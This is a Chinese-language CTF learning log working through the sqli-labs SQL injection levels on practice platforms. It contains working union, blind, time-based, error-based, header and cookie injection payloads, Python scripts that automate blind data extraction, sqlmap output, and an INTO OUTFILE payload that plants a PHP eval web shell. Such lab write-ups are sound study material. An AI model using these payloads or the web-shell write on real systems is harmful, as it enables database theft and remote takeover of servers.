说明
突然发现buuctf上可以直接做sqllibs 有点意思!
最近开始刷sqllibs!!!
less1
从第一题开始
首先从最简单的入手
?id=1'
回显
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
再试下?id=1"
发现正常
?id=1' order by 4%23
报错 说明查询应该有三列
-1' union select 1,2,3%23
回显 2,3
所以接着爆库
-1' union select 1,database(),3%23
爆出security
-1' union select 1,version(),3%23
爆出数据库版本 10.2.26-MariaDB-log
-1' union select 1,group_concat(schema_name),3 from information_schema.schemata%23
-1' union selcet 1,group_concat(table_name),3 from information_schema.tables%23
-1' union select 1,group_concat(column_name),3 from information_schema.columns%23
?id=-1' union select 1,group_concat(column),3 from information_schema.columns where table_schema='ctftraining' and table_name = 'flag'%23
拿到flag
?id=-1' union select 1, group_concat(flag) ,3 from ctftraining.flag%23
sqlmap学习一下
less2
-1 union select 1,group_concat(flag),3 from ctftraining.flag%23
less3
$sql = "select * from users where id = ('$id') limit 0,1"
输入1'
看一下报错
check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
select * from users where id = ('1') order by 4%23') limit 0,1
之后就一模一样了
不知为何上面的报错极其诡异
less4
试一下1"
报错
the right syntax to use near '"1"") LIMIT 0,1' at line 1
把上一题的pyload改为 1") ....
即可
less5
随便试一试
发现出不来结果了 要开始盲注了!
那就开始吧!
1' and length(database())>8%23
出不来了!
所以判断数据库长度为8
1' and substr(database(),1,1) = 'a'%23
1' and substr((select table_name from information_schema.tables where table_schema = 'ctftraining' limit 0,1),1,1)= 'e'#
手工真的是麻烦。。。
等下贴个脚本
import requests
def determine(text):
if 'You are' in text:
return 1
else:
return 0
url = "http://95e07679-ca7b-4f20-a702-b6ba38e85ad7.node3.buuoj.cn/Less-5/"
#破解数据库名称
print('---------数据库名---------')
databasename=''
aph = "abcdefghijklmnopqrstuvwxyz"
for i in range(8):
for j in aph:
payload = "?id=1' and substr(database(),{},1)='{}'%23".format(i+1,j)
s = url + payload
r = requests.get(s)
if determine(r.text) == 1 :
databasename += j
break
print(databasename)
tablename = ""
for i in range(10):
for j in aph:
payload = "?id=1' and substr((select table_name from information_schema.tables where table_schema = 'ctftraining' limit 0,1),{},1)='{}'%23".format(i + 1, j)
s = url + payload
r = requests.get(s)
if determine(r.text) == 1 :
tablename += j
break
print(tablename)
less6
sqlmap一下看到有两种。。。接下来为了练习· 纯手工
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=1" AND 4328=4328#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1" AND (SELECT 3689 FROM(SELECT COUNT(*),CONCAT(0x717a626b71,(SELECT (ELT(3689=3689,1))),0x717a767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mUPM
?id=1" and length(database())>8%23
和上题一样?
貌似只是单引号变双
less7
题目都说了要用outfile
sqlmap找到注入点
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 6962=6962 AND ('SJWP'='SJWP
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 9272 FROM (SELECT(SLEEP(5)))TRrJ) AND ('NgRV'='NgRV
接下来来脱裤
爆出有哪些数据库
import requests
def determine(text):
if 'You are' in text:
return 1
else:
return 0
url = "http://f5ce892b-71b8-4a78-ac72-7b6d422c73b9.challenge.ctf.show:8080/"
aph = "abcdefghijklmnopqrstuvwxyz"
schemas = ""
for i in range(100):
for j in aph:
payload = "?id=1') AND substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}' AND ('SJWP'='SJWP".format(i + 1, j)
s = url + payload
r = requests.get(s)
if determine(r.text) == 1 :
schemas += j
print(schemas)
break
for i in range(100):
for j in aph:
payload = "?id=1') AND substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),{},1)='{}' AND ('SJWP'='SJWP".format(i + 1, j)
s = url + payload
r = requests.get(s)
if determine(r.text) == 1 :
schemas += j
print(schemas)
break
emmm 稍微改一下 就OK啦
到这里突然发现自己写的脚本极其垃圾。。。大写变小写 下划线 出不来。。。
彻底整改!!!
import requests
def determine(text):
if 'You are' in text:
return 1
else:
return 0
url = "http://68c4cbfa-6d9e-4ba1-8b45-6ccf70df6a39.challenge.ctf.show:8080/"
schemas = ""
for i in range(100):
for j in range(65,123):
payload = "?id=1') AND ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),{},1))={} AND ('SJWP'='SJWP".format(i + 1, j)
s = url + payload
r = requests.get(s)
if determine(r.text) == 1 :
schemas += chr(j)
print(schemas)
break
好多了。。。但是貌似FLAG_COLUMN为空。。。
问题又回到了 outfile
往服务器写shell?
所以之前白忙活了(也不算 改进了脚本
outfile的用法
select 'shell' into outfile 'path'
emm 往哪写。。
/var/www/html/1.php
试一下
http://68c4cbfa-6d9e-4ba1-8b45-6ccf70df6a39.challenge.ctf.show:8080/?id=1') AND select '<?php eval($POST_[cmd]); ?>' into outfile 'C:\\var\www\html\1.php' AND ('SJWP'='SJWP
不知为何 死都写不进去
好像是不能在这里执行语句?
应该是 AND 与 AND 中间只能进行判断
换种思路 观察到了 右边应该还有一个)
来进行闭合 所以何以考虑union注入
猜想应该可以了
?id=1')) union select '<?php eval($POST_[cmd]); ?>' into outfile 'C:\\var\www\html\1.php'%23
测试一下
?id=1')) union select 1,2,3%23
可以跑的通 so 稍微改进一下
?id=1')) union select 1,2, '<?php eval($POST_[cmd]); ?>' into outfile '/tmp/1.php' %23
应该是路径有问题 fuck
或许我应该来查找一下题目的路径?
在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL。并且无法用sql语句对其进行修改
突然发现 tmd 写进去了 但是 会报错。。。日
?id=1')) UNION SELECT 1,2,'<?php eval($_POST[cmd]);?>' into outfile "/var/www/html/4.php";--+
less8
垃圾sqlmap连注入点都没给我跑出来
简单试了一下
?id=1' union select 1,2,3--+
呃 和普通的盲注没任何其区别呀。。。
接下来就不多说了。。咳咳
less9
简单trytry
?id=1' AND if(length(database())>9,sleep(5),1)%23
sqlmap要指定 technique -T 才能出来payload
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 3399 FROM (SELECT(SLEEP(5)))AtVH) AND 'QcJu'='QcJu
接下来就开始搞脚本吧!
思路
if(substr(database(),1,1)='s',sleep(5),1)
schemas = ""
for i in range(100):
for j in range(65,123):
payload = "?id=1' AND if( ord( substr(database(),{},1) ) = {} ,sleep(3),1)%23".format(i+1,j)
s = url + payload
print(s)
r = requests.get(s)
if(r.elapsed.seconds) >= 2:
schemas += chr(j)
print(schemas)
break
行倒是行 就是太慢。。。
还容易出错。。。(网络问题
好想会多线程。。。
那就去学。。。
看了salmap运行 猜测sqlmap多线程原理:
先判断需要爆破的长度:
再创造出与之数量对应的线程数?
yes
爆列名 FLAG_COLUMN
tables = ""
for i in range(0,8):
for j in range(65,123):
payload = "?id=1' AND if( ord( substr( (select column_name from information_schema.columns where table_schema = 'ctftraining' and table_name = 'FLAG_TABLE' limit 0,1), {},1 ) ) = {} ,sleep(5),1)%23".format(i+1,j)
s = url + payload
r = requests.get(s)
if(r.elapsed.seconds) >= 4:
tables += chr(j)
print(tables)
break
less11
太简单了。。。
less12
试一下最常用的
") and updatexml(1,concat(0x7e,(select database()),0x7e),1)#
接下来就so easy啦
less17
UPDATE 表名称 SET 列名称 = 新值 WHERE 列名称 = 某值
update的注入 想了又想 可以在后面直接进行拼接??
update xxx set password = "123456" where username = "admin"
加上
update xxx set password = "123456" where username = "admin" or 1=1#
那么payload应该长这样
username = " or 1=1#
password = 123456
然而并不行。。。
可恶啊
emmm 换种思路
我们搞password
123456" AND 1=1#
try
1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#
emmmm 结果。。。
Data too long for column 'password' at row 8
哎 好像有回显了
再try
1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#
ok了
开心
注意 要输入一个正确的用户名才会有回显 不然啥都出不来
less18
可以看出他会把我们的 User Agent 给存下来 然后返回给我们
用了个 sqlmap 结果没成功。。。
估计是 insert
那么 尝试闭合一下 然后直接报错注入? 可
")and updatexml(1,concat(0x7e,(select database()),0x7e),1)#
emmm不行
回想一下
INSERT INTO 表名称 VALUES (值1, 值2,…)
首先得把)闭合了
试一下堆叠注入
emmm 还是不行。。。吐了 问题出在哪呢
");updatexml(1,concat(0x7e,(select database()),0x7e),1)#
可能是思路不对。。。注入点
看一下有几个value。。。
1')%23
额 刚才太急了 现在来分析一下下
check the manual that corresponds to your MariaDB server version for the right syntax to use near '%23', '120.36.51.124', 'admin')' at line 1<br>
终于成功了。。。
1' or updatexml(1,concat(0x7e,database()),0) or '
values( '1 ' or updatexml(1,concat(0x7e,database()),0) or ' ', '120.36.51.124', 'admin')
有趣
less19
和上题一样 换在refer就行了
less20
和上两题不太一样
似乎没有了回显
所以 要好好想想怎么日
sqlmap没跑出来 (可能是我太菜不会用。。。
cao 凭什么buuctf上的less20 就没有回显
ctfshow上的就有回显。。。
很好 开始分析
emmm 首先他把uname记录了下来 user-agent应该也被存了起来
先试一下 ua头能不能注
直接改ua头 发现永远返回 I love your cookie
有点恶心。。。
突然发现 有两个包 而第二个包应该是决定返回值的!
GET /index.php HTTP/1.1
Host: dbf27bb7-6115-41e0-a267-4b0ef8d362d0.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://burpsuite/
Connection: close
Cookie: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin
Upgrade-Insecure-Requests: 1
而这里的cookie带了一个 uname。怪不得sql什么都没跑出来 少给了一个包。。。
这次试一下改第二个包里的ua头
试了一下 这次ua头好像注不了了
so cookie尝试。。。
改一下cookie 发现开始报错了 有戏
Cookie: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin'
结束战斗
Cookie: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin'+and+updatexml(1,concat(0x7e,(select database()),0x7e),1)+and+'
找到sqlmap的正确打开方式了
Parameter: uname (Cookie)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin' AND 8192=8192 AND 'nKOx'='nKOx
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin' AND (SELECT 5017 FROM(SELECT COUNT(*),CONCAT(0x71787a6271,(SELECT (ELT(5017=5017,1))),0x716a6a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MBUd'='MBUd
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin' OR SLEEP(5) AND 'oQjC'='oQjC
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=-8022' UNION ALL SELECT NULL,NULL,CONCAT(0x71787a6271,0x4662706a53565a626e576354526f686b44586c635746476e6a784864516e6b48556843596a4e476a,0x716a6a7071)-- -
直接可以爆出来所有信息